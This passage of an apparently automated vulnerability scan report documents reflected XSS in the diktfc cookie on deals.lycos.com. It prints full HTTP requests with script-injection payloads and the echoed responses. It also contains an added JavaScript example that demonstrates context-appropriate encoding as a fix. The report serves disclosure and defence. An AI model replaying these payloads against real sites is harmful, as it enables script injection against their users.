<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
xt/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/hp-home-coupons-up-to-400-off-414278",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa5635";alert(1)//0d3ef562288"
});
</script>
...[SNIP]...
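The two findings above (1.187 and 1.188) are the two reflection contexts this report keeps hitting for the diktfc cookie on deals.lycos.com: the c15 query parameter inside the scorecardresearch <img src="..."> attribute, where the response entity-encodes & as &amp; but leaves " and < untouched, and the c15 field of the inline COMSCORE.beacon() call, where the value lands inside a double-quoted JavaScript string literal. The following is an added example, not code from the XSS.CX report or from Lycos: it models both templates in simplified form, renders them as observed (vulnerable) and with a context-appropriate encoder (hardened), and applies the same check the scanner does, namely whether the marker-wrapped probe comes back byte-for-byte. All function names and the constructed cookie values are this example's own.

```javascript
'use strict';
// Added example (not code from the XSS.CX report or from Lycos). It models the
// two reflection points the report shows for the diktfc cookie on
// deals.lycos.com: the c15 field of the COMSCORE.beacon() call (JavaScript
// string context) and the c15 query parameter of the scorecardresearch <img>
// tag (HTML attribute context). Template shapes are simplified; function
// names and the sample values below are this example's own.

// Constructed cookie values in the shape of the report's payloads: the
// scanner's random marker, the probe, then a second marker. The JS probe is
// shown after the %3b -> ';' decoding the application performed.
const JS_PAYLOAD   = '2f8d2";alert(1)//6cf56fb792b';
const ATTR_PAYLOAD = 'c62c4"><script>alert(1)</script>9c619f6f3d6';

// Encoder for a value embedded in a double-quoted JavaScript string literal.
// JSON.stringify escapes quotes, backslashes and control characters and adds
// the surrounding quotes; the extra replacements keep "</script>" and the
// U+2028/U+2029 line terminators from ending the <script> block or the
// statement, which JSON.stringify alone does not prevent.
function encodeForJsString(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Encoder for a value embedded in a double-quoted HTML attribute. The
// report's tracker tag entity-encodes '&' (as &amp;) but not '"' or '<',
// which is exactly what lets the attribute probe close src="..." and open a
// <script> element.
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeForHtmlAttribute(value) {
  return String(value).replace(/[&<>"']/g, (c) => ATTR_ESCAPES[c]);
}

// The beacon as rendered in the report (vulnerable: raw value between quotes)
// and with the JS-string encoder applied (hardened).
function renderBeacon(cookieValue, hardened) {
  const c15 = hardened ? encodeForJsString(cookieValue) : '"' + cookieValue + '"';
  return [
    '<script type="text/javascript">',
    'COMSCORE.beacon({',
    'c1:2,',
    'c15:' + c15,
    '});',
    '</script>',
  ].join('\n');
}

// The tracker image as rendered in the report (vulnerable: only '&' encoded)
// and with full attribute encoding (hardened).
function renderTracker(cookieValue, hardened) {
  const c15 = hardened
    ? encodeForHtmlAttribute(cookieValue)
    : cookieValue.replace(/&/g, '&amp;');
  return '<img src="http://b.scorecardresearch.com/p?c1=2&amp;c15=' + c15 +
         '&amp;cj=1" alt="tracker" />';
}

// The check the scanner makes: is the probe, markers intact, present in the
// response body unmodified? If so the input crossed into the output context
// without encoding appropriate to that context.
function reflectedUnmodified(body, probe) {
  return body.includes(probe);
}

// Runs both contexts through both renderers and reports which ones reflect
// the probe unmodified. Returns an object rather than printing so the result
// can be asserted on.
function audit() {
  return {
    beaconVulnerable:  reflectedUnmodified(renderBeacon(JS_PAYLOAD, false), JS_PAYLOAD),
    beaconHardened:    reflectedUnmodified(renderBeacon(JS_PAYLOAD, true), JS_PAYLOAD),
    trackerVulnerable: reflectedUnmodified(renderTracker(ATTR_PAYLOAD, false), ATTR_PAYLOAD),
    trackerHardened:   reflectedUnmodified(renderTracker(ATTR_PAYLOAD, true), ATTR_PAYLOAD),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(audit());
}
```

Two points worth keeping in mind when applying this. First, the encoder has to match the context the value lands in: attribute encoding alone would not save the beacon (a quote in a JavaScript string is not neutralised by &quot;, which a script block does not decode), and JSON.stringify alone does not save an attribute. Second, the remediation text in the report is right that the better fix for the beacon is to keep the cookie value out of inline script altogether, for example by reading it from an attribute on an element after it has been attribute-encoded; the encoder above is the fallback when the inline write cannot be removed.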

1.189. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/iphone-app-price-cuts-deals-from-1-414092

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d30a"%3balert(1)//dda5081c78 was submitted in the diktfc cookie. This input was echoed as 1d30a";alert(1)//dda5081c78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a"%3balert(1)//dda5081c78; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A1d30a";alert(1)//dda5081c78"
});
</script>
...[SNIP]...

1.190. http://deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/iphone-app-price-cuts-deals-from-1-414092

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23774"><script>alert(1)</script>f4fd1e37b84 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/iphone-app-price-cuts-deals-from-1-414092 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:53 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/iphone-app-price-cuts-deals-from-1-414092&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A23774"><script>alert(1)</script>f4fd1e37b84&amp;cj=1" alt="tracker" />
...[SNIP]...

1.191. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kempler-and-strauss-watch-cell-phone-175-413939

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad3ea"><script>alert(1)</script>6be4c9f934a was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aad3ea"><script>alert(1)</script>6be4c9f934a&amp;cj=1" alt="tracker" />
...[SNIP]...

1.192. http://deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kempler-and-strauss-watch-cell-phone-175-413939

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7814e"%3balert(1)//72d8244a306 was submitted in the diktfc cookie. This input was echoed as 7814e";alert(1)//72d8244a306 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/kempler-and-strauss-watch-cell-phone-175-413939 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e"%3balert(1)//72d8244a306; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:06 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/kempler-and-strauss-watch-cell-phone-175-413939",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7814e";alert(1)//72d8244a306"
});
</script>
...[SNIP]...

1.193. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39673"%3balert(1)//133a711edd1 was submitted in the diktfc cookie. This input was echoed as 39673";alert(1)//133a711edd1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673"%3balert(1)//133a711edd1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A39673";alert(1)//133a711edd1"
});
</script>
...[SNIP]...

1.194. http://deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44e2d"><script>alert(1)</script>71fb8bc76fa was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/keydex-stand-for-ipad-ebook-reader-for-14-413522 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:55 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/keydex-stand-for-ipad-ebook-reader-for-14-413522&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A44e2d"><script>alert(1)</script>71fb8bc76fa&amp;cj=1" alt="tracker" />
...[SNIP]...

1.195. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a01b2"%3balert(1)//174a20976d8 was submitted in the diktfc cookie. This input was echoed as a01b2";alert(1)//174a20976d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2"%3balert(1)//174a20976d8; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aa01b2";alert(1)//174a20976d8"
});
</script>
...[SNIP]...

1.196. http://deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63277"><script>alert(1)</script>b757cca267c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19038

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/kodak-zi8-1080p-sdhc-digital-camcorder-80-414390&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A63277"><script>alert(1)</script>b757cca267c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.197. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ee78"><script>alert(1)</script>a4a1fb5c58d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:07 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7ee78"><script>alert(1)</script>a4a1fb5c58d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.198. http://deals.lycos.com/deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/lenovo-amd-dual-core-1-6ghz-aio-20-pc-499-414294

Issue detail

